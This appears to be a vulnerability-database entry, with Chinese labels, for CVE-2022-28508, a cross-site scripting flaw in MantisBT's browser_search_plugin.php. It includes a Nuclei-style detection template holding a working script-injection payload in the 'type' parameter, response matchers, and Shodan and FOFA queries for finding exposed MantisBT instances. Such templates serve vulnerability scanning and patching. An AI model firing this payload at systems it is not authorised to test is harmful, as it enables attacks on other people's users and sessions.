CVE-2022-28508: MantisBT < 2.25.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: MantisBT | POC: 已公开

漏洞描述

MantisBT before 2.25.2 contains a cross-site scripting vulnerability in browser_search_plugin.php. The application does not properly sanitize the 'type' parameter, which allows attackers to inject arbitrary web script or HTML via a crafted URL.

PoC代码[已公开]

id: CVE-2022-28508

info:
  name: MantisBT < 2.25.2 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    MantisBT before 2.25.2 contains a cross-site scripting vulnerability in browser_search_plugin.php. The application does not properly sanitize the 'type' parameter, which allows attackers to inject arbitrary web script or HTML via a crafted URL.
  impact: |
    Successful exploitation allows attackers to execute arbitrary JavaScript code in the context of a victim's browser,potentially leading to session hijacking, credential theft, or phishing attacks.
  remediation: |
    Upgrade to MantisBT version 2.25.2 or later which contains the fix for this vulnerability.If upgrading is not immediately possible, restrict access to the browser_search_plugin.php endpoint.
  reference:
    - https://github.com/YavuzSahbaz/CVE-2022-28508/blob/main/MantisBT%202.25.2%20XSS%20vulnurability
    - https://www.mantisbt.org/bugs/changelog_page.php
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28508
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-28508
    cwe-id: CWE-79
    epss-score: 0.01452
    epss-percentile: 0.8027
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"MantisBT"
    fofa-query: title="MantisBT"
  tags: cve,cve2022,mantisbt,xss,opensearch,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/browser_search_plugin.php?type=text%27%22()%26%25<acx><ScRiPt>alert(document.domain)</ScRiPt>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "<ShortName>"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/opensearchdescription"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206e07f90372fa4106738eed792e4b25fba637a3840a3b3b41c09469e04c99eeee022100d875b5450efac3525a6cb974e9f61c3bd2c7d681b1e9c49f15a0739e793f87c5:922c64590222798bb761d5b6d8e72950

相关漏洞推荐